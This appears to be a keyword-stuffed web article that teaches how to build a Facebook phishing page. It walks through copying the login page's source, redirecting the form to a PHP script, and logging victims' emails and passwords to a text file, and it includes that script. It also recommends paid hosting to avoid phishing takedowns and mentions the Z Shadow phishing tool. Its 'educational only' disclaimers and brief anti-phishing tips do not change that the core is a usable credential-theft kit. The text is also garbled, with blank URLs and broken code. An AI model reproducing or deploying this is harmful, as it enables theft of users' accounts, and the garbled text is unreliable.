Create A Phishing Site Facebook

Phishing is an art of stealing credential details or password and username of the user by providing him the similar or look-alike page that he uses to enter a password or credential details. Now we are going to tell you how you can create phishing page for Facebook.

  1. Create A Phishing Site Facebook Login
  2. Facebook Phishing Script
  3. Facebook Phishing Page Download
  4. Facebook Phishing Website
  5. Phishing Page For Facebook

There are a lot of ways of creating Phishing page for Facebook but we will be focusing on the method that is simple and does not require any programming knowledge. This method can be used and applied by anyone from freelancer to a programmer.

What is Phishing? Phishing is the process of setting up a fake website or webpage that basically imitates another website. Attackers frequently employ this method to steal usernames and passwords. Most frequently, the process works as follows: A user clicks on a bad link to a phishing site. To create phishing page, go to the and then right-click on the blank area, you will see the option view source page.

First of all, let me tell you that this article is only for educating people about how phishing works and how should they prevent phishing scams. Please don’t use these techniques for malicious purposes.

What Is Phishing?

Phishing is a most popular technique that hackers use for hacking passwords and stealing sensitive information like credit cards, banking username & passwords etc.

It is easy for anyone who is having little technical knowledge to get a phishing page done and that is why this method is so popular.

Phishing scams prompt users to enter sensitive details at a fake webpage (phishing page) whose look and feel are very identical to legitimate web pages. In most cases, the only difference is URL.

Z Shadow is an open source phishing tool for popular social media and email platforms. Z Shadow works by creating login pages via a specific crafted link and capturing user credentials upon entering. Disclaimer: These tools were created for education and research purposes only and won't be held liable for your actions. Go to Make sure you are not logged in to Facebook. Press “Ctrl U” to view the source code. Copy the source code and paste it in a notepad. Find the action attribute of the login form in the code. To make it simple, let's say that facebook phishing is a way to make and create fake facebook website according to the real website for negative purpose, such as: stealing credentials, data, etc. Okayto make it more simple, let's start the tutorial.hands on will make us understand better isn't it?

URL can also be spoofed in some cases if the legitimate website is vulnerable. It is difficult for a commoner to identify the phishing scams page because of its trustworthy layout.

How Does Phishing Work?

Create A Phishing Site Facebook Login

FacebookFacebook phishing code

Hackers / Attackers target general public and send them phishing links through email or personal message where the victim is prompted to click on a link in the email. The user/victim will open the Phishing page that pretends to be legit.

Common people who don’t find that phishing page suspicious are induced to enter their sensitive information and all the information would get sent to the hacker/attacker.

Facebook phishing website

How to Create Phishing Page for Facebook?

We are going to tell you how to create phishing page for Facebook. Again keep in your mind not to use these techniques for malicious purpose.

  • Go to Make sure you are not logged in to Facebook.
  • Press “Ctrl U” to view the source code.
  • Copy the source code and paste it in a notepad.
  • Find the action attribute of the login form in the code. Search for keyword “action” without quotes by pressing “Ctrl F” in notepad. In Facebook login page, action attribute was filled with Facebook login process URL. You should replace it with process.php.
  • You have to find name of input fields using inspect element (Ctrl Shift I in Chrome), in our case, it is email and pass.
  • Save this file as index.html.
  • Now you have to get username and password stored in a text file named phishing.txt.
  • Create a file named process.php using the following code.
Facebook phishing link


<?if(isset($_POST[’email’]) && isset($_POST[‘pass’])){$password=file_get_contents(‘phishing.txt’);$phishing = fopen(“phishing.txt”,”w”);fwrite($phishing,$password.”Email : “.$_POST[’email’].” , Password”.$_POST[‘pass’].”n”);fclose($file);echo ‘<script>window.location.href=””</script>’;}elseecho ‘<script>window.location.href=”index.html”</script>’;?>

How to Put Phishing Page in a URL?

To host the Facebook phishing page in a URL, you need to have two things:

  1. Domain
  2. Web Hosting

Get a Free Domain

You can create a lifetime free domain at Bluehost if you pay for their hosting plans. Once you create a domain, you need to get hosting and setup name servers for it. If you select Bluehost you don’t need to setup nameservers since it will already be set.

Get Web Hosting

Almost all free hosting panels would block phishing pages. So you need to get any paid shared hosting package, it would cost around $4 USD per month. I prefer Bluehost for their excellent service and performance.

How could you protect yourself from phishing scams?

Hackers can reach you in many ways like email, personal messages, Facebook messages, Website ads etc. Clicking any links from these messages would lead you to a login page. Whenever you find an email that navigates you to a webpage, you should note only one thing which is URL. Because nobody can spoof URL except when there is any XSS zero-day vulnerability.

Facebook Phishing Script

What is the URL you see in browser address bar? Is that really Is there any Green color secure symbol (HTTPS) provided in the address bar? You can prevent hacking by remembering these questions.

Perfect Phishing Pages

Check the URL here>> It is so is a subdomain of Therefore it is a phishing page.

Facebook Phishing Page Download

Google Chrome doesn’t differentiate the sub-domain and domain, unlike Firefox does. SSL Certificates (HTTPS) can be obtained from many vendors, few vendors give SSL Certificate for Free for 1 year. It’s not a big deal for a novice to create a perfect phishing page like this. So beware of it.

Phishing scams

Phishing scams are attempts by scammers/hackers/cybercriminals to trick you to enter your sensitive information. Such as internet banking username & passwords, credit card details etc. As described above, phishing scams focus on retrieving monetary details indirectly.

Facebook Phishing Website

Phishing Email

Most of the time phishing scams happens through email. Hackers spoof the email address of any legitimate website or authority to send phishing scam email. So the users are convinced to believe that the email is sent from a legit website.

Phishing Page For Facebook

By using email headers, hackers can easily spoof an email address. Server scripting languages like PHP helps a commoner to spoof from email address easily. Popular email services like Gmail are smart enough to identify phishing email and route it to the spam folder. But still, there are some ways for a hacker to send phishing emails.